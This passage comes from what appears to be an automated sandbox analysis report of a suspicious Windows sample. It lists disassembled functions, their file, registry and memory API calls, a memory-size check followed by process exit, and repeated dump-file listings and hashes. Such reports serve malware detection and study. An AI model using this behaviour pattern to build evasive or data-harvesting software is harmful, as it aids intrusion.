CloseHandle.KERNEL32(?,00000000,?,00EB88A0,?,003E110C,?,00000000,?,003E1110,?,00000000,003E0AEF), ref: 003D6B1A
ExitProcess.KERNEL32 ref: 003D6B22

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: f70825764bf76d7e0094359c990734b3dc249e3f67e71a10ba23095409b7f083
Instruction ID: e4a3c15104f2376706e517bdf58c3dd170ff910607626dd37922554f4ed558f7
Opcode Fuzzy Hash: f70825764bf76d7e0094359c990734b3dc249e3f67e71a10ba23095409b7f083
Instruction Fuzzy Hash: CE314172940208AADB07FBF0ED57FEE7779AF04340F10451AF512AA282DF705905D7A6

Function 003C99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
LocalFree.KERNEL32(003C148F), ref: 003C9A90
CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 6842b44a6d7c336a91d823a57d4f27f68064f0410681862cbe770ddf383d7e5f
Instruction ID: 45487f1ec1e94a0f2b4f69c82b841a3ff47d45a8f7932dba6b54ba4b78c29f9e
Opcode Fuzzy Hash: 6842b44a6d7c336a91d823a57d4f27f68064f0410681862cbe770ddf383d7e5f
Instruction Fuzzy Hash: 9C3109B8A00209EFDB15CF94D989FAE77B9FF48340F118159E911A7290D774AE41CFA1

Function 003D4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00EBDFA0), ref: 003D47DB

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D4801
lstrcat.KERNEL32(?,?), ref: 003D4820
lstrcat.KERNEL32(?,?), ref: 003D4834
lstrcat.KERNEL32(?,00EAB018), ref: 003D4847
lstrcat.KERNEL32(?,?), ref: 003D485B
lstrcat.KERNEL32(?,00EBD058), ref: 003D486F

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003D8D90: GetFileAttributesA.KERNEL32(00000000,?,003C1B54,?,?,003E564C,?,?,003E0E1F), ref: 003D8D9F

Part of subcall function 003D4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003D4580
Part of subcall function 003D4570: RtlAllocateHeap.NTDLL(00000000), ref: 003D4587
Part of subcall function 003D4570: wsprintfA.USER32 ref: 003D45A6
Part of subcall function 003D4570: FindFirstFileA.KERNEL32(?,?), ref: 003D45BD

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 51d734c3b1caa8fac121f9211a3b961a1bb0d3e442dd66d28266a6b1fb3a20d8
Instruction ID: 5f8d3aec35f4e302ab0279056ca1f46ed47678d17486122f922025f4a8def6c2
Opcode Fuzzy Hash: 51d734c3b1caa8fac121f9211a3b961a1bb0d3e442dd66d28266a6b1fb3a20d8
Instruction Fuzzy Hash: 7231A2B794030867CB11FBB0EC85EEE737DAB48300F40558AB3599A181EE70E789CB91

Function 003C1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003C123E
__aulldiv.LIBCMT ref: 003C1258
__aulldiv.LIBCMT ref: 003C1266
ExitProcess.KERNEL32 ref: 003C1294

Strings

@, xrefs: 003C1233

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: d072a57bef1cddab49fa5a90e5cb796b1dbe23a7cb67e93edb3e28da2f2fb2ac
Instruction ID: 7181a7ff01452b14093dbd633a8a3025652ab0ebfcfa1fed8385698562fc6dac
Opcode Fuzzy Hash: d072a57bef1cddab49fa5a90e5cb796b1dbe23a7cb67e93edb3e28da2f2fb2ac
Instruction Fuzzy Hash: 11016DB5D80308BAEB11EBE4DC49FAEBB78AB05701F208449E705FA2C1D7B469419799

Function 003D40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,00EBD398,00000000,00020119,?), ref: 003D40F4
RegQueryValueExA.ADVAPI32(?,00EBDEF8,00000000,00000000,00000000,000000FF), ref: 003D4118
RegCloseKey.ADVAPI32(?), ref: 003D4122
lstrcat.KERNEL32(?,00000000), ref: 003D4147
lstrcat.KERNEL32(?,00EBDF10), ref: 003D415B

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: 2f6993ec3e06701f5efbe1769a8c2a88800ee871c7fceeff0465dfa5eec432a5
Instruction ID: 0345eb560fd98f5b741abb7166dd32dcec4d4572548ecea9a6674062a3b6b727
Opcode Fuzzy Hash: 2f6993ec3e06701f5efbe1769a8c2a88800ee871c7fceeff0465dfa5eec432a5
Instruction Fuzzy Hash: E441DAB7D402086BDB15EBE0EC46FFE333DBB48300F00455DB6159A181EA759F888B92

Function 6CB9C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6CB9C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CB9C969
GetSystemInfo.KERNEL32(?), ref: 6CB9C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CB9C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CB9C9E2

Memory Dump Source

Source File: 00000000.00000002.1689033198.000000006CB81000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB80000, based on PE: true

Associated: 00000000.00000002.1689014684.000000006CB80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689084512.000000006CBFD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689106840.000000006CC0E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1689125183.000000006CC12000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb80000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 7ecc409682f5656c3019b239c806bf3c8b556b9db6d370ab1e5a0bb8657d667c
Instruction ID: 6fd478cff89a311ae2c333f85d0702e2eb83517a6d92715879f9ecf2f68f51fa
Opcode Fuzzy Hash: 7ecc409682f5656c3019b239c806bf3c8b556b9db6d370ab1e5a0bb8657d667c
Instruction Fuzzy Hash: 49210431741604ABDB15AF64CC84BAE73B9EB4B704FA1012EF943A7A80DB315D40C7A5

Function 003D7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7E37
RtlAllocateHeap.NTDLL(00000000), ref: 003D7E3E
RegOpenKeyExA.KERNEL32(80000002,00EABCB0,00000000,00020119,?), ref: 003D7E5E
RegQueryValueExA.KERNEL32(?,00EBD018,00000000,00000000,000000FF,000000FF), ref: 003D7E7F
RegCloseKey.ADVAPI32(?), ref: 003D7E92

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 608d90d66d088fef8a670a29c3f8003a7b0b59952618fa8f55c0d942f890bfae
Instruction ID: 2b3e42603957f89264768092e24ff0ba36760f8b70ab504437e549412f977e96
Opcode Fuzzy Hash: 608d90d66d088fef8a670a29c3f8003a7b0b59952618fa8f55c0d942f890bfae
Instruction Fuzzy Hash: 961151B2A84305EBD705CFD4ED49FBBBBBDEB44750F10825AF605A7680D77458008BA1

Function 003C12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C12B4
RtlAllocateHeap.NTDLL(00000000), ref: 003C12BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003C12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003C12F5
RegCloseKey.ADVAPI32(?), ref: 003C12FF

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 565d861862c0eb9be215a8a15a4067ff738c6fc44d5def82d157de0f789cb1db
Instruction ID: 72a4de06d98a779c35bfb484d36fc1b292731151071833ed56cc18448680aeee
Opcode Fuzzy Hash: 565d861862c0eb9be215a8a15a4067ff738c6fc44d5def82d157de0f789cb1db
Instruction Fuzzy Hash: F90131B9A40308BBDB00DFE0DC49FAFB7B9EB48701F008159FA05D7280D6709A018F51

Function 003CA0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

